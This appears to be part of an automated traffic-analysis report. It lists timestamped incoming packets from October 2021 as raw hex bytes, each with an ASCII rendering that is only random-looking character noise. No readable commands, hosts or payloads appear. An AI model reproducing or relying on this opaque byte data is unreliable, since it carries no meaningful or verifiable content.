                                                                          2021-10-13 14:18:11 UTC192INData Raw: f3 6a 30 e7 dc fe 15 75 72 27 76 fd c6 e8 03 91 45 5e ef d2 b0 88 7f 70 92 f4 4a ca 49 d7 9b cb fe 94 03 f4 2e 22 03 51 90 36 f1 1f 9c 2e 70 bf c7 e0 43 80 c5 88 7e e1 6e 75 85 ed 78 a6 20 44 58 32 8d 66 53 19 ad 5b 29 a0 c9 6f 9b 8a 75 88 8e 51 15 e3 05 28 a3 07 c4 b0 37 eb 9c 59 50 ba 80 e4 ab bf 47 fa 42 85 27 04 3f 9e 3a 56 e7 d9 e8 2d f5 4e 6a 51 86 8d a8 3c 62 ce 29 1e 51 4c 53 99 e9 4f 4b 6d 73 24 c5 b3 a7 0e 6f 04 6b bb 42 e9 5e 70 27 1f 92 00 76 e4 72 67 3d 8c d0 b4 2c 79 d7 75 6c 23 f4 c7 cf 80 57 cf 98 fe db a5 29 ed 77 58 6d fd b3 00 82 58 c9 34 1b 84 39 c6 ff 53 88 fb b2 7c 2b c8 a7 e1 46 70 c7 d0 51 a3 88 2a 97 95 0e 81 bd 89 b0 e6 fd 7b 10 a4 23 f3 c6 f6 81 7f 45 15 02 45 ea f2 d4 8b 88 d7 19 e1 58 b7 2b 15 f2 fe 80 d6 88 ca 2b 90 73 ed d1
                                                                          Data Ascii: j0ur'vE^pJI."Q6.pC~nux DX2fS[)ouQ(7YPGB'?:V-NjQ<b)QLSOKms$okB^p'vrg=,yul#W)wXmX49S|+FpQ*{#EEX++s
                                                                          2021-10-13 14:18:11 UTC193INData Raw: e9 0f 2b 85 d5 30 39 78 44 59 9c 35 55 07 06 79 08 e1 9f 35 be 2f 56 5a b2 bb f1 7c 4e c6 bd e1 71 cc 49 0a 8d 65 f1 8a 0a 29 4f fd 25 e6 7a 4b 74 b3 6c 9e 2c ff dd f2 5f c0 81 72 af 06 81 f0 1c 19 7a 46 87 db 20 fc 82 cd c7 e4 28 1b 0f 21 22 0a 5c 57 91 df 73 38 e3 c8 9c 8e 06 50 2d 24 82 b2 b1 86 1f 42 f3 7f f4 81 2a 79 5a 58 1d 0c fc fd 41 68 39 3e d4 f9 20 f3 98 de ed 0e 77 73 33 43 d1 96 5f d4 83 e8 f6 32 a9 19 eb 4b 5b 73 bd 65 52 46 ce b1 51 b5 82 7d 71 7e a2 40 88 0a ee 14 59 e1 ff d3 bc d1 18 cf 8a e7 02 c3 b7 8d 0d ed 11 07 1a 03 3a af 3d b8 36 7d 5f 7a 01 06 a1 af 1d c9 1c c9 d9 3e 14 6c 58 47 e3 36 cc e5 a6 34 d2 92 62 e1 13 ab 88 a9 0c ce 2e f2 7b 2d e9 fa 0e 45 5e ef f9 b5 bb 0d 64 06 4f b4 2d cb e2 dc d0 97 42 81 7e 87 91 20 d8 f4 6d 45 13
                                                                          Data Ascii: +09xDY5Uy5/VZ|NqIe)O%zKtl,_rzF (!"\Ws8P-$B*yZXAh9> ws3C_2K[seRFQ}q~@Y:=6}_z>lXG64b.{-E^dO-B~ mE
                                                                          2021-10-13 14:18:11 UTC194INData Raw: 81 a9 a7 56 36 e0 fb 8e 52 7c d4 00 9a 66 a9 2c f8 86 36 a1 7b bd 1d 5b ca 6c 0b 30 b9 ef cd 07 53 b4 81 6d e7 70 5a c7 43 5a af 3d 02 1a bd 97 5f 6a 18 e4 1f 5b 89 11 8d c9 82 6e c8 a3 7a 75 4a 24 20 be 43 ac 9d 47 75 59 51 d0 be ca e6 ee 28 c5 fe d9 85 0b 04 bc 9e 41 56 a2 d9 6b 2d 76 4e 2f 51 0f 1b cc 3c 64 cb 89 1e 7a 4c 16 99 48 4f 80 6d 36 25 64 95 73 0e 2a 04 c8 b1 51 e9 43 70 84 1f 51 00 08 e5 b2 6d 16 fb 92 b4 ef 79 34 71 6f 21 37 c7 dc 80 4a cf 78 fe f0 af 6c 91 81 58 ee fd f6 04 82 59 e2 34 5e 84 39 c7 ec 53 95 fa 92 d6 22 c8 ba e1 66 75 ec d0 14 a3 c8 2b bc 95 4b 81 fd 89 a3 2a c8 7b 70 a5 30 f7 db f6 e1 7e 6e 15 47 45 6a f3 ff 81 cd 92 97 e0 73 b7 6e 11 32 ff ab d6 cd ca eb 91 60 ed cc d8 03 5b b4 cb 2d 68 ed f3 1f b9 e0 ee 5a 5e a2 0d b8 f7
                                                                          Data Ascii: V6R|f,6{[l0SmpZCZ=_j[nzuJ$ CGuYQ(AVk-vN/Q<dzLHOm6%ds*QCpQmy4qo!7JxlXY4^9S"fu+K*{p0~nGEjsn2`[-hZ^
                                                                          2021-10-13 14:18:11 UTC196INData Raw: 56 ce 31 11 3f ee ef 7a 3c 1d 92 a3 a1 08 97 49 4e 1c 69 76 c1 0a 6f 49 e2 a0 ad 7a 03 e8 81 dd c6 2c 9d 2e fa 06 9b 81 16 ae 0e de ab 1c 7f e1 55 d1 81 20 94 c8 c4 8d bc 28 58 db 09 71 6f 5c 12 8c f0 f9 63 e3 8f 90 aa 53 35 2d 45 c1 ae 11 ce 1f 21 05 54 7e ef 2a 1c ac 57 cf 63 fc 9a bf 45 b7 64 d4 ba 96 d9 66 b0 ed 4b c4 75 40 1a d1 d1 2d d9 09 a1 f6 53 55 10 4b 02 5b 10 32 66 f4 0f ce d4 bd 96 26 34 73 19 e1 40 c9 42 ec 57 14 e1 be 9b be 94 56 cf cb af 00 84 f8 8d 4c a5 13 66 5d 03 53 e7 3f db 6a 7d 36 32 00 63 fc af 76 81 1e ae 87 3e 59 25 59 04 bd 36 87 ac a4 71 e6 92 35 a8 11 ec bf a9 57 87 2f 95 61 59 a5 bb 5f 06 09 a7 ec d4 f3 0d 19 4e 5a d7 66 cb a6 94 c7 f2 0a 81 39 cf 86 47 93 f4 0d 0e 0a 65 73 1a 46 7c 16 64 a9 49 f3 b5 2c e1 c9 65 2c 23 26 56
                                                                          Data Ascii: V1?z<INivoIz,.U (Xqo\cS5-E!T~*WcEdfKu@-SUK[2f&4s@BWVLf]S?j}62cv>Y%Y6q5W/aY_NZf9GesF|dI,e,#&V
                                                                          2021-10-13 14:18:11 UTC197INData Raw: c8 0e cb 57 36 4a 3c 71 59 dc ec b3 63 ee e1 c9 1e 98 1d 16 c6 bf 0e c5 58 2d 6d 57 d7 15 06 77 87 5b 0d ce 76 3f 8a e5 0d 88 e3 22 15 e3 54 4c be 44 c9 b0 00 8f 68 1c b4 ba ed 80 ee f8 a0 fa 11 e1 0b 63 d9 ea 1e 1f c6 d9 2c 48 02 19 46 3f 6b e2 ac 68 0c bd ec 7f 1e 1c 64 f6 2b 2a f3 1e 7f 40 64 f4 11 7a 7a 76 a7 d8 34 9a 30 32 fd 56 35 00 47 95 d7 09 44 e9 f4 d0 ef 2d 5c 07 0a 40 53 c7 90 ef 2b ab 78 9c 94 a5 0f 89 94 19 8a 99 f6 53 ca 18 d3 79 3f ea 58 a0 89 37 95 a9 fb 17 56 ac db 84 0a 3c 8d be 75 c4 ad 4f bc f2 2e f5 a2 c4 c2 95 94 36 1f c1 59 95 b2 93 85 7e 1d 70 33 1a 26 92 8c ff 80 b8 dd 89 15 de 0b 71 32 8c ce a2 92 8f 85 f0 02 81 a9 b6 03 07 e5 bf 72 0d 83 96 7d d5 85 8a 5a 2d c7 79 e7 92 fb 68 7b 90 64 6b 81 b1 dd 4e b2 3e e0 da c5 19 25 cb 3f
                                                                          Data Ascii: W6J<qYcX-mWw[v?"TLDhc,HF?khd+*@dzzv402V5GD-\@S+xSy?X7V<uO.6Y~p3&q2r}Z-yh{dkN>%?
                                                                          2021-10-13 14:18:11 UTC198INData Raw: 5a e8 6f 67 6d 8f 82 e8 09 2e d9 de fa ea 40 9a 25 9b 08 bb 81 35 8e 7a e9 8f 72 7d cb 38 f0 ad 4c 99 c3 a5 a2 9f 28 5c f8 7d 61 4c 31 27 8c 99 d3 40 ad a9 bb cf 1b 34 48 50 c1 c7 1f ed 51 23 2e 31 1a dd 53 09 8f 19 c8 48 99 fd 9e 20 81 7c 9b aa 97 ac 4e 9b a3 6f ee 10 06 3a b4 e2 35 9f 34 8a 9a 7c 73 7d 4c 45 3c 16 01 39 e0 3a a1 c7 93 f2 25 01 3d 1f cb 25 8b 79 89 60 03 91 88 bc c8 b8 7a aa ff a9 61 ae d5 8d 63 88 67 58 40 70 54 dd 71 d9 4f 18 52 09 65 72 eb fa 63 ac 6c 87 ae 53 7e 6c 3e 22 80 69 80 8a c9 44 da e6 16 93 5f ca 9b cc 1f a9 4a 86 5b 7d 88 95 6f 20 33 9d a2 d4 d7 68 7b 60 3f c0 70 9b b0 b2 a3 e2 20 f5 11 e7 eb 45 da 93 2a 30 55 47 5a 79 6d 43 78 55 ad 28 d8 9a 2c d5 e6 11 3b 08 45 54 df 40 71 73 65 a4 20 81 fa fc da a1 8a 3e 80 f5 a8 0f 11
                                                                          Data Ascii: Zogm.@%5zr}8L(\}aL1'@4HPQ#.1SH |No:54|s}LE<9:%=%y`zacgX@pTqORerclS~l>"iD_J[}o 3h{`?p E*0UGZymCxU(,;ET@qse >
                                                                          2021-10-13 14:18:11 UTC199INData Raw: 34 b2 99 19 cf 5f 31 6f 57 96 22 1a 7b 91 3c 3d c5 60 27 91 ee 0a ed cc 10 02 97 64 41 dc 72 d9 d5 44 a6 11 1e a2 d5 de 94 ad d0 a8 96 3c e6 7f 6d d3 f0 00 22 d6 ab 02 4f 03 3a 4a 51 49 e1 ba 5b 17 8e fd 6a 08 25 74 ec 3c 2a 80 2e 59 49 14 da 18 6f 5e 6d a7 d5 03 8c 2f 11 fc 7e 25 69 67 8b c1 26 62 f8 e7 dd 8d 0c 40 10 6f 69 56 a9 b8 ec 2f 9f 0a 91 93 c0 1f 9e d7 37 9c 8f 83 70 f6 3c 86 67 2a e5 4d a2 a9 2b f6 9e e2 09 51 a7 d4 92 27 05 98 a2 7d c1 bd 5f d9 95 19 e4 91 e1 c2 84 89 17 19 d1 49 b0 b4 98 95 0c 0f 76 33 04 1e 87 8d e2 af a2 cd 85 73 e7 0f 67 53 92 ea a4 bf ab 92 d0 14 99 be bb 61 15 f4 ae 2d 3a 98 99 6b d0 8d 8b 19 31 cf 7d d9 83 fc 6b 70 90 68 7b f8 97 cc 4e 9f 15 fb db d4 0f 71 ea 2b eb 9a 11 6a 36 a9 0a bb 28 0e 60 72 78 d2 bf df d7 b0 7f
                                                                          Data Ascii: 4_1oW"{<=`'dArD<m"O:JQI[j%t<*.YIo^m/~%ig&b@oiV/7p<g*M+Q'}_Iv3sgSa-:k1}kph{Nq+j6(`rx
                                                                          2021-10-13 14:18:11 UTC201INData Raw: 9b e8 72 ad 67 bb a9 75 19 ec 3c b6 a5 49 fc ef ad cf 99 41 1b f9 60 35 4c 35 57 ac 99 bf 42 8a c8 86 de 69 27 42 77 f3 dc 1a e6 78 17 2d 3d 1a fc 58 10 ea 15 c3 25 bf 97 f9 01 9f 23 91 93 d1 9f 48 f7 aa 64 83 3d 6c 5d b0 fc 6a bb 2b e6 95 58 12 74 43 45 3e 19 75 00 fa 48 a9 db fa d4 2b 73 30 15 a6 04 e0 0a a9 7f 5c a7 91 d3 f9 ba 1e 87 e6 e7 61 a8 b0 ef 6f ed 52 74 6c 6d 52 ec 5e d4 4e 1f 33 19 6b 06 d3 ca 64 96 5d a8 bf 4d 57 03 3a 2c f4 62 b1 84 ca 47 c9 fd 01 8c 57 c2 98 c8 73 8c 43 9d 67 46 fa ae 7e 24 2e 9d 8a da c8 60 39 6b 35 d7 44 cb a6 b6 c7 f0 26 f5 00 c5 e7 4e 89 91 2a 2f 0a 40 52 1a 65 5d 16 44 a9 28 c7 bc 46 ca d0 37 15 0b 40 46 ea 76 48 46 64 a6 3e 96 92 d0 bf b2 bf 38 b0 fd af 13 09 d4 9c 5e b6 a2 d8 cc 18 35 5d 6f 07 95 fe 26 c6 36 7f d2
                                                                          Data Ascii: rgu<IA`5L5WBi'Bwx-=X%#Hd=l]j+XtCE>uH+s0\aoRtlmR^N3kd]MW:,bGWsCgF~$.`9k5D&N*/@Re]D(F7@FvHFd>8^5]o&6
                                                                          2021-10-13 14:18:11 UTC202INData Raw: 8b e3 01 e6 a2 36 13 97 49 7e db 75 de d9 2b 85 68 2a b5 ce f4 b2 8b cd b7 93 36 eb 0b 56 c8 f2 06 33 d6 8f 0e 5f 05 27 40 3f 0f ea be 48 3b b9 ec 6c 09 25 79 f7 48 3c e5 19 69 52 01 c1 07 67 45 6a c8 f8 3e 87 35 15 f6 6c 38 6f 66 e5 e1 1e 65 f8 f0 d9 c1 30 7b 5b 2c 4e 5a b7 ae e5 39 bc 11 91 9e a5 0b 88 e0 07 af 8d 86 6c eb 3a 83 40 37 eb 57 c7 8b 36 e1 a4 de 12 5b a9 ce 88 09 1f ec 83 6d d0 bc 4e d1 dc 25 e7 92 fa ce 87 94 12 1f cb 30 97 be 85 95 17 00 74 33 2c 05 9d ff ec a8 a3 e6 a1 10 d4 01 60 5c 8b e8 b9 a3 ac 82 f6 15 9f ad a6 6a 0f ee cb 5e 0d 99 a8 5e da 83 81 2f 30 d6 4e d7 99 f3 60 7e 89 73 6e f5 bf d7 54 ed 1b fc da ff 28 18 d7 3a f2 84 04 4e 26 b9 30 a0 2b 1b 4d 7c 71 d1 b2 fb cd a6 7b 2f be 58 b4 e9 6f ad 58 80 c8 f7 dd b4 dd 0c 00 c0 78 f7
                                                                          Data Ascii: 6I~u+h*6V3_'@?H;l%yH<iRgEj>5l8ofe0{[,NZ9l:@7W6[mN%0t3,`\j^^/0N`~snT(:N&0+M|q{/XoXx
                                                                          2021-10-13 14:18:11 UTC203INData Raw: 58 1b de 79 35 6d 2c 57 8f 80 bf 63 93 c8 91 da 1b 3b 5d 24 c5 c7 07 e5 7e 32 43 36 6a a9 49 09 ea 33 d9 25 af 91 9c 20 85 23 b2 89 d1 be 52 f7 aa 7c ec 00 76 5d 93 e7 6a 9a 30 e6 b2 43 12 55 58 45 1d 02 75 21 e1 48 86 c0 fa f7 31 73 11 0f a6 23 fa 0a 88 65 5c 84 8b d3 d8 a0 1e a8 fc e7 42 b1 b0 ce 76 ed 57 75 15 46 43 af 79 ca 22 3a 20 7a 48 74 b4 c8 75 bd 41 90 aa 5f 69 6c 1a 2b 91 57 b1 e5 f0 5b ec fa 12 93 11 ef 9f db 7a ad 5b 9d 76 54 a9 9f 7c 24 32 8f 98 da c8 4e 13 66 28 b4 48 ae b6 82 a6 e1 22 f5 3e f4 86 53 bf 80 10 25 7c 47 4d 7b 70 36 74 53 e3 2a c7 ff 48 d4 83 26 01 1b 26 64 c4 47 7a 66 46 97 28 85 9e de cd d5 98 25 81 f7 bf 05 30 b1 8e 5f a7 8f b3 fd 3f 1f 6c 6e 19 ec cd 3e a9 21 76 a0 c0 5d 39 65 d7 da 4c 85 da 53 85 ec 3a 7e 48 a6 a6 ea 97
                                                                          Data Ascii: Xy5m,Wc;]$~2C6jI3% #R|v]j0CUXEu!H1s#e\BvWuFCy": zHtuA_il+W[z[vT|$2Nf(H">S%|GM{p6tS*H&&dGzfF(%0_?ln>!v]9eLS:~H
                                                                          2021-10-13 14:18:11 UTC205INData Raw: c9 ab b7 97 cc b0 9f 34 ab 59 71 d2 ea 28 3b c7 f7 2e 55 15 2b 5f 25 66 e2 b5 6f 01 bd ff 77 19 29 65 99 1b 36 f3 19 53 49 4a e1 01 60 5e 6d a5 de 7f a0 2d 04 e1 6d 3e 70 5b 80 c0 11 7f ef f0 c7 ef 34 5d 16 1d 4e 44 a8 ba f4 64 99 11 8d 85 c4 00 af f5 2b 87 9e d8 43 ed 34 92 5d 32 e1 4b 94 89 21 e3 92 f1 18 4b c8 e9 98 15 05 89 bd 3a f1 bd 45 c8 fc 26 e4 d3 cb cc 8b 90 12 1c c0 42 a0 be 84 97 17 0d 70 34 45 27 9a 9c f9 a2 a4 d6 86 07 99 38 7c 41 8a ca ba 8f ab 98 f8 03 c3 81 ab 50 05 f2 bd 44 0b 88 84 1f fe 85 9a 13 30 d1 79 d9 99 f6 6c 6a fc 66 6a f5 89 fb 52 84 10 fd e0 cf 0e 14 ca 5e d6 8b 17 6c 2d bf 2c d5 02 0a 7a 57 76 c5 be ff cc bb 68 32 b2 44 da 8e 79 bc 73 8f f8 f1 c3 b5 c6 16 0e e4 68 94 1f 0b cc c7 af cf 10 2b f3 25 b4 8c 4c 53 f6 e0 f7 14 ec
                                                                          Data Ascii: 4Yq(;.U+_%fow)e6SIJ`^m-m>p[4]NDd+C4]2K!K:E&Bp4E'8|APD0yljfjR^l-,zWvh2Dysh+%LS
                                                                          2021-10-13 14:18:11 UTC206INData Raw: 50 f2 dc 16 d8 6d 27 30 31 6e da 2a 1e 8f 23 f6 51 99 90 89 29 94 57 b1 a9 a3 bc 51 92 99 7d 83 06 63 29 8e e2 0f b4 31 8a 97 46 77 40 5b 20 28 16 01 15 90 1e af c4 96 e2 05 1d 06 13 c3 32 ea 7e 89 42 3d 94 96 a7 cd d1 79 aa f9 b8 41 b7 c4 ec 67 85 7e 62 7b 77 42 af 4c dd 56 22 13 08 67 73 d9 ca 7e bd 6d c9 a8 5b 6f 33 1c 3f 9d 45 b7 96 a4 55 dd e0 12 98 62 ab 91 cc 6b 91 64 97 7d 5e fa 89 69 31 1f a5 89 cc c9 0d 39 73 5a f7 5b cb 86 a9 c7 d2 37 81 19 f2 86 67 ae f4 07 30 0a 65 56 74 61 57 62 21 a2 39 c5 9a 42 c2 c5 0a 16 04 47 43 b0 7c 72 66 4c a0 0b 8b 88 d6 de a1 da 2b 8a e2 92 32 17 b9 8d 5e b0 bb dc dc 1a 3f 29 2d 09 e1 bd 19 b3 10 67 a0 d7 57 2e 00 c6 cc 47 bc d1 5d 85 fd 4e 33 4d fd 81 d7 8c e5 ed 7e f0 e6 fb c5 9c e1 e8 69 20 cc 5c 70 65 6a ef b7
                                                                          Data Ascii: Pm'01n*#Q)WQ}c)1Fw@[ (2~B=yAg~b{wBLV"gs~m[o3?EUbkd}^i19sZ[7g0eVtaWb!9BGC|rfL+2^?)-gW.G]N3M~i \pej
                                                                          2021-10-13 14:18:11 UTC207INData Raw: 13 36 5b 51 5d e8 ba 58 25 a3 e5 4a 1f 34 62 99 09 3f f0 08 58 40 25 df 18 5a 4f 7c bc bb 06 9b 2a 04 e1 5e 3d 6c 5c 80 ca 13 16 eb f0 c0 b0 30 5a 1b 0a 53 63 a2 a4 f4 4a 88 1d 8a a4 c0 14 99 94 1f 8b 89 a1 69 ec 3d 8d 43 0a e1 41 b3 ec 00 e1 89 f7 1c 55 a1 d4 86 25 1e 82 a4 71 db bc 2b cf e1 39 e4 9c e5 ca 88 87 38 1f cb 44 96 a3 82 e1 1d 01 7b 33 20 12 87 ff c9 b8 d7 fa 95 73 f3 1b 15 77 8a ab 90 b8 ca ac e4 60 a5 b9 d2 62 15 80 a9 58 68 8e 82 1f dd 95 ee 3f 2b a2 6b cd f7 f2 7c 19 be 77 0f c2 a0 b8 7e 9b 7c dc d8 a0 2c 07 b9 19 ed ea 2b 79 45 bb 29 d5 27 19 0e 70 69 b7 bf ea b8 b1 6c 5b b1 41 da 8e 6a c8 6e a8 8a dd c4 d0 f0 15 67 c4 6c 94 1c 04 bc e1 b6 ab 1d 32 85 2d b1 e3 40 49 93 ed f4 42 e9 ad 56 e5 b5 d1 25 a4 66 b6 fa ba 49 ad 6f 8d 86 66 b8 98
                                                                          Data Ascii: 6[Q]X%J4b?X@%ZO|*^=l\0ZScJi=CAU%q+98D{3 sw`bXh?+k|w~|,+yE)'pil[Ajngl2-@IBV%fIof
                                                                          2021-10-13 14:18:11 UTC208INData Raw: c3 46 d5 23 d5 fc f1 d8 23 e6 e0 06 82 75 07 5d d1 96 6a d9 44 c6 f4 33 1c 1e 31 44 5b 79 38 1f c4 2d a3 c1 96 f7 34 16 7b 4f 92 6e bb 24 dc 3a 6c e1 fa d7 bf d1 1e cf 8a e1 15 d1 a8 8c 16 e1 14 01 00 11 29 ae 2d b0 25 7b 47 68 18 07 a6 8e 17 cf 0b db d7 3f 09 78 5f 52 e6 2e c2 f7 a8 32 ba 80 6b e0 03 a3 f0 bc 0d d6 2e e0 25 2b ef e8 14 44 52 fa ef b5 ba 0c 7e 00 58 a6 23 c3 c6 fd c7 84 43 85 5f 86 94 2c df f3 4d 56 02 2e 3d 1a 02 24 1e 24 e4 4b a7 de 24 a2 83 65 76 48 23 30 b2 27 0b 0f 2f c5 4d f6 ee bf b7 d5 c8 40 eb b6 cc 7d 6c c4 ee 3b c9 b0 ca 80 34 31 30 5d 1e e1 d8 38 c6 72 17 da b6 26 52 13 86 a8 2d be ca 19 a1 ee 4a 5f 65 f0 84 ec 87 e0 e6 1d 84 e2 be aa ea 8f 86 02 45 a8 65 09 0f 56 ea bb 12 5c 00 fd c4 bb aa 6e 10 ee 25 a6 d6 0a a0 d3 d7 5b 87
                                                                          Data Ascii: F##u]jD31D[y8-4{On$:l)-%{Gh?x_R.2k.%+DR~X#C_,MV.=$$K$evH#0'/M@}l;410]8r&R-J_eEeV\n%[
                                                                          2021-10-13 14:18:11 UTC210INData Raw: 68 16 24 75 32 21 0b 0a 06 c9 b3 59 ed 45 62 05 5e 54 00 08 f7 33 4a 11 ac 97 b5 fd f8 75 7f 69 01 37 da ce 01 0f c7 78 ff e2 24 51 ff 15 39 e2 dd f5 01 93 d8 bb 25 df dd 28 46 bd 5f b5 f8 93 6f b8 1d a8 60 43 63 6d 99 10 83 c9 2a b6 92 4b 83 fc 94 b1 67 85 7d 60 a4 31 fb c5 f6 e5 74 6f 04 67 46 6a f3 f7 80 ca d1 b7 ee 7d b5 7f 94 0b e2 a5 d0 cd c8 ea 8d 70 ef c8 d2 02 61 9c ce 2d 68 ff 76 6a bc c0 ef 47 5b ac 07 bf f2 9b 07 08 7d 38 12 8f de bd 1a ed 6e 18 af a5 6a 73 a5 42 87 ee 63 0e 4b c6 5b d2
                                                                          Data Ascii: h$u2!YEb^T3Jui7x$Q9%(F_o`Ccm*Kg}`1togFj}pa-hvjG[}8njsBcK[
                                                                          2021-10-13 14:18:11 UTC210INData Raw: 44 7d 67 10 18 b6 d5 98 98 d5 18 55 c5 30 d3 f5 0e 49 ad c3 98 f7 af cd a8 7f 7b 9c 19 89 46 63 bc a1 dd b7 47 70 8b 51 da fe 2c 23 81 bb 9e 40 89 da 57 8a de c0 43 db 7a cd 9f 8f 20 d5 07 cf c6 14 dd ad 33 dc c2 dd 3c 51 07 a2 4e d8 f2 c0 57 e8 30 17 b9 cd e6 25 d7 cd 23 c2 15 a0 3d 9f 76 89 ab 2d 84 de 00 bb f2 48 3e 85 23 de 92 ed c5 b3 92 57 81 48 ad db d9 c1 26 39 75 a8 37 37 ff 28 a9 b0 38 d1 96 58 07 64 8d ca 42 0f 31 1a 58 31 0c 66 49 67 9d 26 d2 00 cc 44 0a e0 3c 07 8b 37 46 5b 9b b9 33 6e 46 c6 e1 f3 57 cf 55 17 57 6f 33 87 08 35 10 e0 e1 e8 79 57 b1 9d be 87 2c fe 69 e6 74 ce 80 73 fe 1c 3a 63 1d 07 a4 40 a4 45 ad fd 93 c4 4f 5a 2f 58 93 1c 27 a8 c5 56 df e2 3e 61 e0 c6 d8 a8 15 7d 31 31 95 2f ea 89 11 4c 51 d5 87 bc 38 f8 73 56 bb a4 bc f3 ec
                                                                          Data Ascii: D}gU0I{FcGpQ,#@WCz 3<QNW0%#=v-H>#WH&9u77(8XdB1X1fIg&D<7F[3nFWUWo35yW,its:c@EOZ/X'V>a}11/LQ8sV
                                                                          2021-10-13 14:18:11 UTC211INData Raw: 5e 59 30 6e 88 b8 57 c3 7a 02 50 87 30 59 66 87 a8 27 f0 b3 37 e0 97 3d 36 11 96 f8 9d e6 87 80 18 84 e4 b3 a4 f0 ab 8a 02 58 aa 26 77 26 00 88 5e fc 5e 08 e4 cb b5 a5 7f 1e ea 38 ad 86 76 80 98 ae 24 d1 a2 dd dc 4d 4c e1 9b 4a c7 f6 2c f2 25 05 55 d8 e2 ee ca c9 43 c0 28 00 5d ba c8 1b 39 74 29 1e de 6d 36 2e d4 9c 05 8d 76 31 1d 2c e0 d9 db e4 4f 88 98 fa b2 66 6a 6b e0 8c f9 b3 65 5a ba 77 ff 58 e3 2e af cf 57 79 d9 83 ac 5e 6d e4 e9 8a c4 7a d2 08 d4 7a bd 31 e8 9f b7 80 75 a3 33 47 0d 40 07 38 b7 f1 e5 14 02 90 95 68 ef 6e 70 d4 6f 66 b4 bf 49 06 37 8b 63 62 1c f9 5e 54 ae 0f 6a ea 08 73 95 a7 4c 73 fe 13 3a 3c 12 b0 b5 4a f9 01 5e f0 b8 aa f7 ee ac c5 f7 59 87 1e 16 3e 97 43 58 ac c4 6e 30 73 47 28 54 12 88 d1 21 61 c7 81 18 7a 4e 1c 84 4d 47 8c 6d
                                                                          Data Ascii: ^Y0nWzP0Yf'7=6X&w&^^8v$MLJ,%UC(]9t)m6.v1,OfjkeZwX.Wy^mzz1u3G@8hnpofI7cb^TjsLs:<J^Y>CXn0sG(T!azNMGm
                                                                          2021-10-13 14:18:11 UTC212INData Raw: d1 84 96 ae de bf 42 67 94 09 16 f7 71 af a6 d2 aa 52 50 97 ce 6b e1 2c 30 98 ae 83 57 9c 58 e7 82 d1 d1 50 d2 61 c4 9c 38 9f ca 15 dc c0 0e cd 8a af eb d2 4d d8 43 01 b4 52 f8 ee 5f 42 f7 30 04 a5 f6 f9 29 d3 c4 35 c1 16 90 2d 11 ad 93 df 25 8d db 04 a8 f9 48 35 eb 32 cc 88 f8 d4 33 11 58 91 5a b6 c2 d0 ce bb bd 68 bb 36 24 ef b4 1c aa 56 d6 05 78 90 45 92 d8 c7 a3 2d 9e f5 30 00 e4 f1 41 bc 34 c0 8a 0b 6c 0d e1 35 09 85 3f 59 5d 9c b2 21 f3 d7 c7 ec f2 45 dc 41 17 57 61 1e 83 1a 3c 1e 63 7e e9 68 ca ed 94 ae 02 b5 fe 65 ef 77 5f 18 73 f9 8f fb e0 12 17 b6 d5 16 ca 32 95 85 d9 ca e8 a9 5b 8f 60 3d 34 52 5f c0 f0 bc 34 61 01 ca bb 99 be 31 21 a7 ae 61 08 8e 4f 43 57 0f bb ab e0 eb 45 28 65 f2 f3 f7 49 99 23 bb f9 b6 d9 4b f7 83 0e f0 75 14 5a d9 98 77 dc
                                                                          Data Ascii: BgqRPk,0WXPa8MCR_B0)5-%H523XZh6$VxE-0A4l5?Y]!EAWa<c~hew_s2[`=4R_4a1!aOCWE(eI#KuZw
                                                                          2021-10-13 14:18:11 UTC214INData Raw: bd 2a e5 82 28 b1 2d 8f f7 f1 f3 8a 95 01 99 fa ab a8 f1 8e 88 11 c7 9a 35 75 3c 06 95 d9 66 41 05 e5 d1 a7 a5 66 1e ed 2d ae bb 71 8f 8a af 3c da b0 59 c8 43 dc c5 88 54 c6 f7 3f f3 2a 32 5e de e5 f6 ef c6 50 d8 23 0a 74 b8 d6 0e 29 e9 ac 0d f9 ea 76 39 db 18 92 82 63 b7 5e 3f f9 ca d0 e4 5a 8d 94 f5 36 7b 73 7e f8 da e2 85 6c 5a b9 3e ef 3f e5 26 be 50 42 66 cb 90 b8 4b 72 e6 f4 8d d8 e5 6e 0e d2 4f bf 3c e1 9f b4 38 7c ac b7 1a 1d 4f 83 a9 be fe 61 46 88 99 86 71 ef 7d 67 44 e8 65 b4 bc 04 13 3a 84 0f 6d 98 45 53 52 ab 12 69 f6 84 60 86 aa 59 67 61 5b 20 be 04 a5 be 4a fa ea 14 d6 ba a8 ea e0 b7 cc fe 59 84 08 0c b8 9e 40 58 a1 d1 6b 29 77 5e 21 59 07 83 d3 3b 62 c7 87 10 72 44 1e 8e 4f 44 95 7f b7 bd 65 bd 69 00 37 0a c6 b5 4c e7 4b 6d 8a 17 4c 0e 00
                                                                          Data Ascii: *(-5u<fAf-q<YCT?*2^P#t)v9c^?Z6{s~lZ>?&PBfKrnO<8|OaFq}gDe:mESRi`Yga[ JY@Xk)w^!Y;brDODei7LKmL
                                                                          2021-10-13 14:18:11 UTC215INData Raw: 98 44 ce fe 2a 36 9b 9c ea 4a 85 d2 4b 88 c7 d1 41 d1 68 df a4 bd 3c dd 09 53 51 08 dd 19 6e d0 ce d8 2e d8 9f bf 4e 6c bc d3 45 fb 23 04 a3 e5 e1 2f c0 cf 3d d5 9c 33 ae 5f b1 f2 ca 23 8e db 09 a8 f9 48 29 8a 21 ca 86 e3 d0 3e 03 44 1d 7d bf da c0 c1 3f 39 6c a7 a9 af e0 33 b4 bd 2d 46 99 c4 93 77 fa cd 45 18 3f 86 d0 2d 17 77 4b 4f 92 3d cf 0b d8 e6 89 ef 29 11 99 b2 6f 48 f3 a2 13 72 5c 45 db e5 6b d7 41 17 5c 61 3b 99 09 21 09 c2 e6 e9 67 48 a9 86 be 9f 24 fb 6b fb 79 d0 ae 75 e1 1b a9 6f 85 18 b6 d4 f6 d6 44 f2 98 d6 4e 63 29 09 1c 49 3b 27 4e d6 8a fe aa 34 61 79 d4 a4 0e 61 af 2d 85 a0 7d 9d 0e c0 f2 56 14 a7 23 7e ef 59 bb a4 61 f5 f1 4d f3 03 d5 eb 50 44 21 fd ea 08 8b 68 03 40 d4 98 62 d1 47 e6 f4 34 0f 15 21 0c 5c 64 60 74 11 d1 cf a3 7b d6 55
                                                                          Data Ascii: D*6JKAh<SQn.NlE#/=3_#H)!>D}?9l3-FwE?-wKO=)oHr\EkA\a;!gH$kyuoDNc)I;'N4aya-}V#~YaMPD!h@bG4!\d`t{U
